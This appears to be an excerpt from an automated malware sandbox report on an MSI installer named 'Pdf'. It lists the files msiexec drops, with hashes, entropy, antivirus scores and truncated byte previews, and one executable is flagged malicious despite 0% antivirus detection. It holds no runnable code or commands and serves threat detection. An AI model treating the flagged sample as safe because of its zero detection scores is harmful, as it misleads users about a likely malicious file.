                                                                  Preview:......................>...................l...................................G.......c.......w...............................Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...................p...............#...6........................................................................................... ...!..."...-.......%...&...'...(...)...*...+...,......./...4...0...1...2...3...7...5...>...A...8...9...:...;...<...=...U...?...@.......B...C...D...E...F...T.......I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                  C:\Windows\Installer\MSI3ECB.tmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1021792
                                                                  Entropy (8bit):6.608380087035959
                                                                  Encrypted:false
                                                                  SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                  MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                  SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                  SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                  SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

                                                                  C:\Windows\Installer\MSI3F39.tmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1021792
                                                                  Entropy (8bit):6.608380087035959
                                                                  Encrypted:false
                                                                  SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                  MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                  SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                  SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                  SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

                                                                  C:\Windows\Installer\MSI3F98.tmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1021792
                                                                  Entropy (8bit):6.608380087035959
                                                                  Encrypted:false
                                                                  SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                  MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                  SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                  SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                  SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

                                                                  C:\Windows\Installer\MSI3FE7.tmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1021792
                                                                  Entropy (8bit):6.608380087035959
                                                                  Encrypted:false
                                                                  SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                  MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                  SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                  SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                  SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

                                                                  C:\Windows\Installer\MSI4075.tmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1021792
                                                                  Entropy (8bit):6.608380087035959
                                                                  Encrypted:false
                                                                  SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                  MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                  SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                  SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                  SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

                                                                  C:\Windows\Installer\MSI4112.tmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):434274
                                                                  Entropy (8bit):6.545426444976944
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4l7GrJZsRtP01Ab+biU50unhTzTQWNy7kokGqzTD:47UJaR10A+biU50unhFNyIGqfD
                                                                  MD5:53A1BEBBDEC2C5D7B6A3E9DBC34280EC
                                                                  SHA1:19435D83EC5088CE0829A0F9D6975AF3B0682095
                                                                  SHA-256:889FA98F3291DC522023B15D37BCDEBCA825620DC9D460BE48DE4F0F09ED7B37
                                                                  SHA-512:44B41DC371D16144A01BD54782C4D0F1B3EB284D7BE3420EEF522CE7B611FE463B360EF161B35020C5DFA70CDEDC253CEC62597C868A877463D76DA2D78778EF
                                                                  Malicious:false
                                                                  Preview:...@IXOS.@.....@..KY.@.....@.....@.....@.....@.....@......&.{47512254-C195-428F-AD42-A0F24652B3FD}..Pdf..rs8dpaIe6D.msi.@.....@.....@.....@........&.{92C98B75-E1D1-429B-9815-3BF9C1AD8A52}.....@.....@.....@.....@.......@.....@.....@.......@......Pdf......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B1A2B65E-F7DC-4079-8165-372C88BB13EF}'.C:\Users\user\AppData\Roaming\Pdf\Pdf\.@.......@.....@.....@......&.{8438ED6F-3E17-4118-8799-F8A99D851E04}..01:\Software\Pdf\Pdf\Version.@.......@.....@.....@......&.{0BF8C5FE-822D-49A6-9F4D-84F19DDB4723}..01:\Software\Microsoft\.@.......@.....@.....@......&.{B93ED057-8995-473C-867B-17ED6B548B26}".01:\Software\Microsoft\Windows NT\.@.......@.....@.....@......&.{E14EB6B7-011A-4A35-BFED-B669968BC133}1.01:\Software\Microsoft\Windows NT\CurrentVersion\.@.......@.....@.....@......&.{E6D432F9-EEA9-4218-B20A-1C3CD0BBE2A9}=.01:\So

                                                                  C:\Windows\Installer\MSI4384.tmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):428248
                                                                  Entropy (8bit):6.538923971741108
                                                                  Encrypted:false
                                                                  SSDEEP:12288:il7GrJZsRtP01Ab+biU50unhTzTQWNy7kokGqzT:27UJaR10A+biU50unhFNyIGqf
                                                                  MD5:432827EC55428786A447B3D848D963B7
                                                                  SHA1:029901586604F3AB1B0BD18868469A96DB0EF470
                                                                  SHA-256:5A4E76F840FE7D9872164C6C3CE85F4DD0405E661C04638E0B8A91157398BBF0
                                                                  SHA-512:EFE03D3446B07180A12D8CD8D0B6D25DD6DA5B445C6D61125B0E81C848A98B78F502A6C7C8C7DFC87B3D5BEAFDEA100AC6580E0D28F2CFB99EDA90A19449C226
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................M...............................................6.............Q....9.........Rich..........PE..L......f.........."....)..........................@......................................@..........................................p..8............l...........;..P...p...............................@............................................text............................... ..`.rdata..*%.......&..................@..@.data....7... ......................@....fptable.....`......."..............@....rsrc...8....p.......$..............@..@.reloc...;.......<...0..............@..B........................................................................................................................................................................................................................................................

                                                                  C:\Windows\Installer\SourceHash{47512254-C195-428F-AD42-A0F24652B3FD}

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.1634397181526743
                                                                  Encrypted:false
                                                                  SSDEEP:12:JSbX72FjDAGiLIlHVRpZh/7777777777777777777777777vDHFA9it/l0i8Q:JtQI5tjiF
                                                                  MD5:0A3DBCC97503559DCAAA71860E43EE06
                                                                  SHA1:1708435477A67F4AB8006850C22DB15A368BD286
                                                                  SHA-256:57FFD9BE5391A9471ED859E18C231D15E9B89520B8F89239B9D3BD637B03A0B5
                                                                  SHA-512:ED5A39A3990F295DA570935CE4D414D08B96E7865C1CEA264F67787F80064CFC3A634CE29295FCB205E027180DCDD61E700F0272B8ECC0F7CAA622D248712DBC
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.5035352720767863
                                                                  Encrypted:false
                                                                  SSDEEP:48:G8PhKuRc06WXJ0FT5F5qF8+MSCWAECiCyro3qMSCcT7:ZhK13FTgF+1ECZ
                                                                  MD5:F143DFEC72D0FE796DFF2E3012D18F50
                                                                  SHA1:38730A7756D3BAC7380FEB9D6A861317722E4DCA
                                                                  SHA-256:707F704494C782BA1D7B1D5D57CCB0636669F0BA47966AD13A8FE176922C0856
                                                                  SHA-512:6EBB12C0D3434398786C9F24F3186FFF3B8FE9FD7479FE6625D9A854807CCA09565626E1447445F97CA95740B68DF58442C9B6E0464F40C3A1D06115C528854C
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):432221
                                                                  Entropy (8bit):5.37516889400589
                                                                  Encrypted:false
                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau/:zTtbmkExhMJCIpErO
                                                                  MD5:04063B6531BB7CBFA9E7D8FF4FFA5005
                                                                  SHA1:79232FA61D07141E4362BDE76239999B2D175645
                                                                  SHA-256:BFB0B034C82CA6F18FF07A7BD1A325D1D02A9306BCA1C0163027CF52C2F8F940
                                                                  SHA-512:580B9A84597F18A3A3A460F456B52BC1BA1EF1D5F3926A52CCBF27E5F31B53618A0A24A60E0A30D62C4BBB8186B31434F921F2CBB97E5F2729B55438852C397C
                                                                  Malicious:false
                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                  C:\Windows\Temp\~DF000A087AB8133DD7.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):1.2102929820892037
                                                                  Encrypted:false
                                                                  SSDEEP:48:snCu7I+CFXJpT5X5qF8+MSCWAECiCyro3qMSCcT7:SC1RTqF+1ECZ
                                                                  MD5:B12429732AE359960571FA86A23280CE
                                                                  SHA1:C420AA919A2B5EA163A2BC5112135FCB2978B65A
                                                                  SHA-256:712BBFBCA15B5B5B79EDAE5776DBEFD05A87D548A2F4F4A2ED5876C3742896E9
                                                                  SHA-512:64722D69AE17E045A1865DE64B654D449962F100B2441C48F3958D8B16F4723BA77FB14AC37AB24EC73E2EFCC50B0488EBCC1B1E80E3B571BB2CF94C061FBCE3
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Temp\~DF0EACC5BCD4F1A532.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Temp\~DF422C9DB071BA3E70.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.5035352720767863
                                                                  Encrypted:false
                                                                  SSDEEP:48:G8PhKuRc06WXJ0FT5F5qF8+MSCWAECiCyro3qMSCcT7:ZhK13FTgF+1ECZ
                                                                  MD5:F143DFEC72D0FE796DFF2E3012D18F50
                                                                  SHA1:38730A7756D3BAC7380FEB9D6A861317722E4DCA
                                                                  SHA-256:707F704494C782BA1D7B1D5D57CCB0636669F0BA47966AD13A8FE176922C0856
                                                                  SHA-512:6EBB12C0D3434398786C9F24F3186FFF3B8FE9FD7479FE6625D9A854807CCA09565626E1447445F97CA95740B68DF58442C9B6E0464F40C3A1D06115C528854C
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Temp\~DF4BC760E91B6FCBCC.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Temp\~DF537EADE216023ABD.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.5035352720767863
                                                                  Encrypted:false
                                                                  SSDEEP:48:G8PhKuRc06WXJ0FT5F5qF8+MSCWAECiCyro3qMSCcT7:ZhK13FTgF+1ECZ
                                                                  MD5:F143DFEC72D0FE796DFF2E3012D18F50
                                                                  SHA1:38730A7756D3BAC7380FEB9D6A861317722E4DCA
                                                                  SHA-256:707F704494C782BA1D7B1D5D57CCB0636669F0BA47966AD13A8FE176922C0856
                                                                  SHA-512:6EBB12C0D3434398786C9F24F3186FFF3B8FE9FD7479FE6625D9A854807CCA09565626E1447445F97CA95740B68DF58442C9B6E0464F40C3A1D06115C528854C
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Temp\~DF6CF72919B72F7C6C.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Temp\~DF959B5B682EBDE045.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Temp\~DF9D63DEB77B685E60.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):0.07120418472562191
                                                                  Encrypted:false
                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOpKDijZtgVky6lit/:2F0i8n0itFzDHFAQZit/
                                                                  MD5:45A16D0491544E8E5EB3944F31357582
                                                                  SHA1:2D3B70F4CF19401ECD3D795679D39FDA451A42D6
                                                                  SHA-256:DA95D0EE70F7F51C701220EB5E64376A24B69D7118C9A00BD32437230CC80CF9
                                                                  SHA-512:FE6E5B78D79E56625096E4192815F6C0FA9BB06182F693CA3962D15A98BB2DB0ABD198BA4EAD5B77C6A330DB1DA528B2049C4372BE4F7B5F0679485E3E71EFBC
                                                                  Malicious:false
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Temp\~DFAE3E9B168B65793C.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):73728
                                                                  Entropy (8bit):0.11431084501225285
                                                                  Encrypted:false
                                                                  SSDEEP:24:6vTxkrwipVkrakrwipVkrSAEVkryjCyrV2BwGlitC+XqaN:6vTeMSCpMSCWAECiCyro3+C2q+
                                                                  MD5:651FD89067FF840C5F18D7E82589A88C
                                                                  SHA1:9ACEC940C95C0AF04CB6AAD7BA32A66A2BBEC795
                                                                  SHA-256:05E61A653F1CFEF2021659A59A01377622502ADB4D459864FE73BBDA523E038C
                                                                  SHA-512:6D082EEF6BAE894F35BB409A3AD6A70831C9DCA8EFA0C155951A80EFAC6A1E1BA137B7F48006742A669A33AAF0FB6722EF46E0A1391CEB9DE52F0151DD82A0BA
                                                                  Malicious:false
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Temp\~DFB94A89296536F38B.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):1.2102929820892037
                                                                  Encrypted:false
                                                                  SSDEEP:48:snCu7I+CFXJpT5X5qF8+MSCWAECiCyro3qMSCcT7:SC1RTqF+1ECZ
                                                                  MD5:B12429732AE359960571FA86A23280CE
                                                                  SHA1:C420AA919A2B5EA163A2BC5112135FCB2978B65A
                                                                  SHA-256:712BBFBCA15B5B5B79EDAE5776DBEFD05A87D548A2F4F4A2ED5876C3742896E9
                                                                  SHA-512:64722D69AE17E045A1865DE64B654D449962F100B2441C48F3958D8B16F4723BA77FB14AC37AB24EC73E2EFCC50B0488EBCC1B1E80E3B571BB2CF94C061FBCE3
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Temp\~DFBCA5FA92B7DCCD25.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Temp\~DFDCE6B5AB3D0B6CFA.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):1.2102929820892037
                                                                  Encrypted:false
                                                                  SSDEEP:48:snCu7I+CFXJpT5X5qF8+MSCWAECiCyro3qMSCcT7:SC1RTqF+1ECZ
                                                                  MD5:B12429732AE359960571FA86A23280CE
                                                                  SHA1:C420AA919A2B5EA163A2BC5112135FCB2978B65A
                                                                  SHA-256:712BBFBCA15B5B5B79EDAE5776DBEFD05A87D548A2F4F4A2ED5876C3742896E9
                                                                  SHA-512:64722D69AE17E045A1865DE64B654D449962F100B2441C48F3958D8B16F4723BA77FB14AC37AB24EC73E2EFCC50B0488EBCC1B1E80E3B571BB2CF94C061FBCE3
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  \Device\ConDrv

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                  Category:dropped
                                                                  Size (bytes):28
                                                                  Entropy (8bit):4.208966082694623
                                                                  Encrypted:false
                                                                  SSDEEP:3:nLWGWNI3ov:nyGWNOov
                                                                  MD5:F2CE4C29DC78D5906090690C345EAF80
                                                                  SHA1:D12E3B86380F0DBEF4FBDFFE2CBFE2144FB7E9CD
                                                                  SHA-256:0356A869FC7E6495BAC33303B002935C317166D0EA5D403BE162573CF01055D8
                                                                  SHA-512:51F939C41710BC3A4E443CDAF33AAE614B043ACC2382A0C836049E34D2F51C8195FD149548752B33E4EDD4299548BB1957B89997FC640C837C9400D76FEA5B74
                                                                  Malicious:false
                                                                  Preview:No Instance(s) Available....

                                                                  \Device\Null

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):41
                                                                  Entropy (8bit):4.1874503350805945
                                                                  Encrypted:false
                                                                  SSDEEP:3:OT2egJgkuLekbevn:OC39uLevn
